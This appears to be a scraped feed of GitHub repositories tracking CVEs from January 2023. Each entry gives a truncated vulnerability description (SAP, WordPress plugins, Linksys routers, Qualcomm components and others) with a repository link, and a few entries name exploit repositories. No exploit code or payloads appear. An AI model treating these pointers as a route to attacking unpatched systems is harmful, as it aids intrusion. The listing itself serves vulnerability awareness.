**In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705066; Issue ID: GN20220705066. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32659](https://github.com/Live-Hack-CVE/CVE-2022-32659) create time: 2023-01-10T06:37:01Z

**In SAP Host Agent (Windows) - versions 7.21, 7.22, an attacker who gains local membership to SAP_LocalAdmin could be able to replace executables with a malicious file that will be started under a privileged account. Note that by default all user members of SAP_LocaAdmin are denied the ability to logon locally by securi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0012](https://github.com/Live-Hack-CVE/CVE-2023-0012) create time: 2023-01-10T06:37:23Z

**The ABAP Keyword Documentation of SAP NetWeaver Application Server - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, for ABAP and ABAP Platform does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. On successful exploitation an attacker can cause lim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0013](https://github.com/Live-Hack-CVE/CVE-2023-0013) create time: 2023-01-10T06:37:18Z

**SAP BPC MS 10.0 - version 810, allows an unauthorized attacker to execute crafted database queries. The exploitation of this issue could lead to SQL injection vulnerability and could allow an attacker to access, modify, and/or delete data from the backend database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0016](https://github.com/Live-Hack-CVE/CVE-2023-0016) create time: 2023-01-10T06:36:57Z

**SAP NetWeaver ABAP Server and ABAP Platform - versions SAP_BASIS 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, KERNEL 7.22, 7.53, 7.77, 7.81, 7.85, 7.89, KRNL64UC 7.22, 7.22EXT, 7.53, KRNL64NUC 7.22, 7.22EXT, creates information about system identity in an ambiguous format. This could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0014](https://github.com/Live-Hack-CVE/CVE-2023-0014) create time: 2023-01-10T06:36:52Z

**OpenAM Web Policy Agent (OpenAM Consortium Edition) provided by OpenAM Consortium parses URLs improperly, leading to a path traversal vulnerability(CWE-22). Furthermore, a crafted URL may be evaluated incorrectly. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22320](https://github.com/Live-Hack-CVE/CVE-2023-22320) create time: 2023-01-10T06:36:48Z

**In SAP Bank Account Management (Manage Banks) application, when a user clicks a smart link to navigate to another app, personal data is shown directly in the URL. They might get captured in log files, bookmarks, and so on disclosing sensitive data of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0023](https://github.com/Live-Hack-CVE/CVE-2023-0023) create time: 2023-01-10T06:36:43Z

**SAP BusinessObjects Business Intelligence Analysis edition for OLAP allows an authenticated attacker to inject malicious code that can be executed by the application over the network. On successful exploitation, an attacker can perform operations that may completely compromise the application causing a high impact on t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0022](https://github.com/Live-Hack-CVE/CVE-2023-0022) create time: 2023-01-10T06:36:39Z

**Due to improper input sanitization of user-controlled input in SAP BusinessObjects Business Intelligence Platform CMC application - versions 420, and 430, an attacker with basic user-level privileges can modify/upload crystal reports containing a malicious payload. Once these reports are viewable, anyone who opens thos CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0018](https://github.com/Live-Hack-CVE/CVE-2023-0018) create time: 2023-01-10T06:36:34Z

**An unauthenticated attacker in SAP NetWeaver AS for Java - version 7.50, due to improper access control, can attach to an open interface and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting users and data on the current system. This could all CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0017](https://github.com/Live-Hack-CVE/CVE-2023-0017) create time: 2023-01-10T06:36:30Z

**In SAP BusinessObjects Business Intelligence Platform (Web Intelligence user interface) - version 420, some calls return json with wrong content type in the header of the response. As a result, a custom application that calls directly the jsp of Web Intelligence DHTML may be vulnerable to XSS attacks. On successful exp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0015](https://github.com/Live-Hack-CVE/CVE-2023-0015) create time: 2023-01-10T06:36:26Z

**The Vision Interactive For WordPress plugin through 1.5.3 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4391](https://github.com/Live-Hack-CVE/CVE-2022-4391) create time: 2023-01-10T02:09:46Z

**The Sunshine Photo Cart WordPress plugin before 2.9.15 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4301](https://github.com/Live-Hack-CVE/CVE-2022-4301) create time: 2023-01-10T02:09:42Z

**The Royal Elementor Addons WordPress plugin before 1.3.56 does not have authorisation and CSRF checks when creating a template, and does not ensure that the post created is a template. This could allow any authenticated users, such as subscriber to create a post (as well as any post type) with an arbitrary title CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4103](https://github.com/Live-Hack-CVE/CVE-2022-4103) create time: 2023-01-10T02:09:39Z

**The Multi Step Form WordPress plugin before 1.7.8 does not sanitise and escape some of its form fields, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4196](https://github.com/Live-Hack-CVE/CVE-2022-4196) create time: 2023-01-10T02:09:35Z

**The Royal Elementor Addons WordPress plugin before 1.3.56 does not have authorization and CSRF checks when deleting a template and does not ensure that the post to be deleted is a template. This could allow any authenticated users, such as subscribers, to delete arbitrary posts assuming they know the related slug. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4102](https://github.com/Live-Hack-CVE/CVE-2022-4102) create time: 2023-01-10T02:09:30Z

**The WPtouch WordPress plugin before 4.3.45 unserialises the content of an imported settings file, which could lead to PHP object injections issues when an user import (intentionally or not) a malicious settings file and a suitable gadget chain is present on the blog. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3417](https://github.com/Live-Hack-CVE/CVE-2022-3417) create time: 2023-01-10T02:09:26Z

**The WPQA Builder WordPress plugin before 5.9.3 (which is a companion plugin used with Discy and Himer WordPress themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3343](https://github.com/Live-Hack-CVE/CVE-2022-3343) create time: 2023-01-10T02:09:21Z

**The ActiveCampaign for WooCommerce WordPress plugin through 1.9.6 does not have authorisation check when cleaning up its error logs via an AJAX action, which could allow any authenticated users, such as subscriber to call it and remove error logs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3923](https://github.com/Live-Hack-CVE/CVE-2022-3923) create time: 2023-01-10T02:09:17Z

**The WPtouch WordPress plugin before 4.3.45 does not properly validate images to be uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3416](https://github.com/Live-Hack-CVE/CVE-2022-3416) create time: 2023-01-10T02:09:13Z

**The Jetpack CRM WordPress plugin before 5.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4497](https://github.com/Live-Hack-CVE/CVE-2022-4497) create time: 2023-01-10T02:09:09Z

**The WP-Table Reloaded WordPress plugin through 1.9.4 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high privilege users such a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4491](https://github.com/Live-Hack-CVE/CVE-2022-4491) create time: 2023-01-10T02:09:06Z

**The Table of Contents Plus WordPress plugin before 2212 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4479](https://github.com/Live-Hack-CVE/CVE-2022-4479) create time: 2023-01-10T02:09:01Z

**The WP Recipe Maker WordPress plugin before 8.6.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4468](https://github.com/Live-Hack-CVE/CVE-2022-4468) create time: 2023-01-10T02:08:57Z

**The Mautic Integration for WooCommerce WordPress plugin before 1.0.3 does not have proper CSRF check when updating settings, and does not ensure that the options to be updated belong to the plugin, allowing attackers to make a logged in admin change arbitrary blog options via a CSRF attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4426](https://github.com/Live-Hack-CVE/CVE-2022-4426) create time: 2023-01-10T02:08:52Z

**The iPages Flipbook For WordPress plugin through 1.4.6 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4394](https://github.com/Live-Hack-CVE/CVE-2022-4394) create time: 2023-01-10T02:08:48Z

**The ImageLinks Interactive Image Builder for WordPress plugin through 1.5.3 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4393](https://github.com/Live-Hack-CVE/CVE-2022-4393) create time: 2023-01-10T02:08:43Z

**The iPanorama 360 WordPress Virtual Tour Builder plugin through 1.6.29 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4392](https://github.com/Live-Hack-CVE/CVE-2022-4392) create time: 2023-01-10T02:08:38Z

**The Bg Bible References WordPress plugin through 3.8.14 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4374](https://github.com/Live-Hack-CVE/CVE-2022-4374) create time: 2023-01-10T02:08:34Z

**The WP CSV WordPress plugin through 1.8.0.0 does not sanitize and escape a parameter before outputting it back in the page when importing a CSV, and doe snot have CSRF checks in place as well, leading to a Reflected Cross-Site Scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4368](https://github.com/Live-Hack-CVE/CVE-2022-4368) create time: 2023-01-10T02:08:30Z

**The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4325](https://github.com/Live-Hack-CVE/CVE-2022-4325) create time: 2023-01-10T02:08:26Z

**The Slimstat Analytics WordPress plugin before 4.9.3 does not sanitise and escape the URI when logging requests, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks against logged in admin viewing the logs CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4310](https://github.com/Live-Hack-CVE/CVE-2022-4310) create time: 2023-01-10T02:08:21Z

**The WP Custom Admin Interface WordPress plugin before 7.29 unserialize user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4043](https://github.com/Live-Hack-CVE/CVE-2022-4043) create time: 2023-01-10T02:08:17Z

**An issue in Inkdrop v5.4.1 allows attackers to execute arbitrary commands via uploading a crafted markdown file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46603](https://github.com/Live-Hack-CVE/CVE-2022-46603) create time: 2023-01-10T02:08:12Z

**The 404 to Start WordPress plugin through 1.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3855](https://github.com/Live-Hack-CVE/CVE-2022-3855) create time: 2023-01-10T02:08:07Z

**The Starter Templates by Kadence WP WordPress plugin before 1.2.17 unserialises the content of an imported file, which could lead to PHP object injection issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3679](https://github.com/Live-Hack-CVE/CVE-2022-3679) create time: 2023-01-10T02:08:03Z

**A vulnerability was found in lukehutch Gribbit. It has been classified as problematic. Affected is the function messageReceived of the file src/gribbit/request/HttpRequestHandler.java. The manipulation leads to missing origin validation in websockets. The name of the patch is 620418df247aebda3dd4be1dda10fe229ea505dd. I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125071](https://github.com/Live-Hack-CVE/CVE-2014-125071) create time: 2023-01-09T23:53:53Z

**A vulnerability classified as critical has been found in CherishSin klattr. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is f8e4ecfbb83aef577011b0b4aebe96fb6ec557f1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is V CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125072](https://github.com/Live-Hack-CVE/CVE-2014-125072) create time: 2023-01-09T23:53:49Z

**A vulnerability was found in gperson angular-test-reporter and classified as critical. This issue affects the function getProjectTables/addTest of the file rest-server/data-server.js. The manipulation leads to sql injection. The name of the patch is a29d8ae121b46ebfa96a55a9106466ab2ef166ae. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10035](https://github.com/Live-Hack-CVE/CVE-2015-10035) create time: 2023-01-09T23:54:08Z

**A vulnerability has been found in j-nowak workout-organizer and classified as critical. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is 13cd6c3d1210640bfdb39872b2bb3597aa991279. It is recommended to apply a patch to fix this issue. VDB-217714 is the identifier CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10034](https://github.com/Live-Hack-CVE/CVE-2015-10034) create time: 2023-01-09T23:54:03Z

**A vulnerability, which was classified as problematic, was found in jvvlee MerlinsBoard. This affects an unknown part of the component Grade Handler. The manipulation leads to improper authorization. The name of the patch is 134f5481e2914b7f096cd92a22b1e6bcb8e6dfe5. It is recommended to apply a patch to fix this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10033](https://github.com/Live-Hack-CVE/CVE-2015-10033) create time: 2023-01-09T23:53:58Z

**Cross Site Scripting (XSS) in Tasmota firmware 6.5.0 allows remote attackers to inject JavaScript code via a crafted string in the field "Friendly Name 1". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36603](https://github.com/Live-Hack-CVE/CVE-2021-36603) create time: 2023-01-09T23:54:12Z

**An arbitrary code execution vulnerability exisits in Linksys WRT54GL Wireless-G Broadband Router with firmware <= 4.30.18.006. The Check_TSSI function within the httpd binary uses unvalidated user input in the construction of a system command. An authenticated attacker with administrator privileges can leverage this vu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43973](https://github.com/Live-Hack-CVE/CVE-2022-43973) create time: 2023-01-09T23:54:31Z

**A null pointer dereference vulnerability exists in Linksys WRT54GL Wireless-G Broadband Router with firmware <= 4.30.18.006. A null pointer dereference in the soap_action function within the upnp binary can be triggered by an unauthenticated attacker via a malicious POST request invoking the AddPortMapping action. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43972](https://github.com/Live-Hack-CVE/CVE-2022-43972) create time: 2023-01-09T23:54:26Z

**An arbitrary code exection vulnerability exists in Linksys WUMC710 Wireless-AC Universal Media Connector with firmware <= 1.0.02 (build3). The do_setNTP function within the httpd binary uses unvalidated user input in the construction of a system command. An authenticated attacker with administrator privileges can lever CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43971](https://github.com/Live-Hack-CVE/CVE-2022-43971) create time: 2023-01-09T23:54:22Z

**A buffer overflow vulnerability exists in Linksys WRT54GL Wireless-G Broadband Router with firmware <= 4.30.18.006. A stack-based buffer overflow in the Start_EPI function within the httpd binary allows an authenticated attacker with administrator privileges to execute arbitrary commands on the underlying Linux operati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43970](https://github.com/Live-Hack-CVE/CVE-2022-43970) create time: 2023-01-09T23:54:18Z

**A vulnerability was found in Control iD Panel. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation of the argument Nome leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0125](https://github.com/Live-Hack-CVE/CVE-2023-0125) create time: 2023-01-09T23:54:34Z

**HTTP header injection vulnerability in Everything all versions except the Lite version may allow a remote attacker to inject an arbitrary script or alter the website that uses the product via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20784](https://github.com/Live-Hack-CVE/CVE-2021-20784) create time: 2023-01-09T21:42:53Z

**The WP-Lister Lite for Amazon WordPress plugin before 2.4.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high-privilege users such as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4369](https://github.com/Live-Hack-CVE/CVE-2022-4369) create time: 2023-01-09T21:43:46Z

**The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4351](https://github.com/Live-Hack-CVE/CVE-2022-4351) create time: 2023-01-09T21:43:42Z

**The Popup Maker WordPress plugin before 1.16.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4362](https://github.com/Live-Hack-CVE/CVE-2022-4362) create time: 2023-01-09T21:43:36Z

**The BookingPress WordPress plugin before 1.0.31 suffers from an Insecure Direct Object Reference (IDOR) vulnerability in it's thank you page, allowing any visitor to display information about any booking, including full name, date, time and service booked, by manipulating the appointment_id query parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4340](https://github.com/Live-Hack-CVE/CVE-2022-4340) create time: 2023-01-09T21:43:32Z

**The Product list Widget for Woocommerce WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4329](https://github.com/Live-Hack-CVE/CVE-2022-4329) create time: 2023-01-09T21:43:27Z

**The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4352](https://github.com/Live-Hack-CVE/CVE-2022-4352) create time: 2023-01-09T21:43:22Z

**NVIDIA distributions of Linux contain a vulnerability in nvdla_emu_task_submit, where unvalidated input may allow a local attacker to cause stack-based buffer overflow in kernel code, which may lead to escalation of privileges, compromised integrity and confidentiality, and denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42270](https://github.com/Live-Hack-CVE/CVE-2022-42270) create time: 2023-01-09T21:43:16Z

**NVIDIA Trusted OS contains a vulnerability in an SMC call handler, where failure to validate untrusted input may allow a highly privileged local attacker to cause information disclosure and compromise integrity. The scope of the impact can extend to other components. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42269](https://github.com/Live-Hack-CVE/CVE-2022-42269) create time: 2023-01-09T21:43:09Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where an unprivileged regular user can cause exposure of sensitive information to an actor that is not explicitly authorized to have access to that information, which may lead to limited inf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42266](https://github.com/Live-Hack-CVE/CVE-2022-42266) create time: 2023-01-09T21:43:06Z

**Gotify server is a simple server for sending and receiving messages in real-time per WebSocket. Versions prior to 2.2.2 contain an XSS vulnerability that allows authenticated users to upload .html files. An attacker could execute client side scripts **if** another user opened a link. The attacker could potentially take CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46181](https://github.com/Live-Hack-CVE/CVE-2022-46181) create time: 2023-01-09T21:43:02Z

**A vulnerability was found in pastebinit up to 0.2.2 and classified as problematic. Affected by this issue is the function pasteHandler of the file server.go. The manipulation of the argument r.URL.Path leads to path traversal. Upgrading to version 0.2.3 is able to address this issue. The name of the patch is 1af2facb6d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25059](https://github.com/Live-Hack-CVE/CVE-2018-25059) create time: 2023-01-09T19:32:43Z

**A vulnerability was found in Modbus Tools Modbus Poll up to 9.10.0 and classified as critical. Affected by this issue is some unknown functionality of the file mbpoll.exe of the component mbp File Handler. The manipulation leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4857](https://github.com/Live-Hack-CVE/CVE-2022-4857) create time: 2023-01-09T19:32:38Z

**A vulnerability has been found in Modbus Tools Modbus Slave up to 7.5.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file mbslave.exe of the component mbs File Handler. The manipulation leads to buffer overflow. The attack can be launched remotely. The exploit has been d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4856](https://github.com/Live-Hack-CVE/CVE-2022-4856) create time: 2023-01-09T19:32:32Z

**A vulnerability, which was classified as critical, was found in SourceCodester Lead Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4855](https://github.com/Live-Hack-CVE/CVE-2022-4855) create time: 2023-01-09T19:32:21Z

**TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48194](https://github.com/Live-Hack-CVE/CVE-2022-48194) create time: 2023-01-09T19:32:14Z

**The Connection handler in Hazelcast and Hazelcast Jet allows a remote unauthenticated attacker to access and manipulate data in the cluster with the identity of another already authenticated connection. The affected Hazelcast versions are through 4.0.6, 4.1.9, 4.2.5, 5.0.3, and 5.1.2. The affected Hazelcast Jet version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36437](https://github.com/Live-Hack-CVE/CVE-2022-36437) create time: 2023-01-09T19:32:09Z

**.NET console application that exploits CVE-2018-9995 vulnerability** : [ST0PL/DVRFaultNET](https://github.com/ST0PL/DVRFaultNET) create time: 2023-01-09T17:29:22Z

**Weave GitOps is a simple open source developer platform for people who want cloud native applications, without needing Kubernetes expertise. A vulnerability in GitOps run could allow a local user or process to alter a Kubernetes cluster's resources. GitOps run has a local S3 bucket which it uses for synchronizing files CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23508](https://github.com/Live-Hack-CVE/CVE-2022-23508) create time: 2023-01-09T16:14:27Z

**Weave GitOps is a simple open source developer platform for people who want cloud native applications, without needing Kubernetes expertise. GitOps run has a local S3 bucket which it uses for synchronizing files that are later applied against a Kubernetes cluster. The communication between GitOps Run and the local S3 b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23509](https://github.com/Live-Hack-CVE/CVE-2022-23509) create time: 2023-01-09T16:14:17Z

**Elrond-GO is a go implementation for the Elrond Network protocol. Versions prior to 1.3.50 are subject to a processing issue where nodes are affected when trying to process a cross-shard relayed transaction with a smart contract deploy transaction data. The problem was a bad correlation between the transaction caches a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46173](https://github.com/Live-Hack-CVE/CVE-2022-46173) create time: 2023-01-09T16:14:13Z

**Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link on a Windows computer. (e.g. in an email, chat link, etc). There are curr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22472](https://github.com/Live-Hack-CVE/CVE-2023-22472) create time: 2023-01-09T16:14:22Z

**A vulnerability classified as problematic was found in Talend Open Studio for MDM. This vulnerability affects unknown code of the component XML Handler. The manipulation leads to xml external entity reference. The name of the patch is 31d442b9fb1d518128fd18f6e4d54e06c3d67793. It is recommended to apply a patch to fix t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4311](https://github.com/Live-Hack-CVE/CVE-2021-4311) create time: 2023-01-09T14:04:01Z

**An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46769](https://github.com/Live-Hack-CVE/CVE-2022-46769) create time: 2023-01-09T14:03:56Z

**A regression exists in the Linux Kernel within KVM: nVMX that allowed for speculative execution attacks. L2 can carry out Spectre v2 attacks on L1 due to L1 thinking it doesn't need retpolines or IBPB after running L2 due to KVM (L0) advertising eIBRS support to L1. An attacker at L2 with code execution can execute cod CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2196](https://github.com/Live-Hack-CVE/CVE-2022-2196) create time: 2023-01-09T14:03:51Z

**no description** : [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study) create time: 2023-01-09T13:21:02Z

**A vulnerability was found in HealthMateWeb. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file createaccount.php. The manipulation of the argument username/password/first_name/last_name/company/phone leads to cross site scripting. The attack can be launched remot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10032](https://github.com/Live-Hack-CVE/CVE-2015-10032) create time: 2023-01-09T11:52:31Z

**A vulnerability classified as problematic has been found in debug-js debug up to 3.0.x. This affects the function useColors of the file src/node.js. The manipulation of the argument str leads to inefficient regular expression complexity. Upgrading to version 3.1.0 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20165](https://github.com/Live-Hack-CVE/CVE-2017-20165) create time: 2023-01-09T11:52:27Z

**A vulnerability was found in 01-Scripts 01-Artikelsystem. It has been classified as problematic. Affected is an unknown function of the file 01article.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is ae849b34 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4310](https://github.com/Live-Hack-CVE/CVE-2021-4310) create time: 2023-01-09T11:52:35Z

**Memory corruption due to buffer copy without checking size of input in modem while receiving WMI_REQUEST_STATS_CMDID command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33276](https://github.com/Live-Hack-CVE/CVE-2022-33276) create time: 2023-01-09T11:54:10Z

**Memory corruption in android core due to improper validation of array index while returning feature ids after license authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33274](https://github.com/Live-Hack-CVE/CVE-2022-33274) create time: 2023-01-09T11:54:05Z

**Information disclosure due to buffer over-read in Bluetooth HOST while processing GetFolderItems and GetItemAttribute Cmds from peer device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33255](https://github.com/Live-Hack-CVE/CVE-2022-33255) create time: 2023-01-09T11:54:00Z

**Memory corruption in Audio due to integer overflow to buffer overflow while music playback of clips like amr,evrc,qcelp with modified content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33266](https://github.com/Live-Hack-CVE/CVE-2022-33266) create time: 2023-01-09T11:53:56Z

**Information disclosure due to buffer over-read in WLAN while handling IBSS beacons frame. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33252](https://github.com/Live-Hack-CVE/CVE-2022-33252) create time: 2023-01-09T11:53:52Z

**Memory corruption in Automotive due to improper input validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33218](https://github.com/Live-Hack-CVE/CVE-2022-33218) create time: 2023-01-09T11:53:47Z

**Memory corruption due to information exposure in Powerline Communication Firmware while sending different MMEs from a single, unassociated device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33265](https://github.com/Live-Hack-CVE/CVE-2022-33265) create time: 2023-01-09T11:53:44Z

**Denial of service in MODEM due to improper pointer handling CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25725](https://github.com/Live-Hack-CVE/CVE-2022-25725) create time: 2023-01-09T11:53:39Z

**Memory corruption in video driver due to type confusion error during video playback CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25721](https://github.com/Live-Hack-CVE/CVE-2022-25721) create time: 2023-01-09T11:53:36Z

**Transient DOS due to buffer over-read in WLAN while parsing corrupted NAN frames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33253](https://github.com/Live-Hack-CVE/CVE-2022-33253) create time: 2023-01-09T11:53:31Z

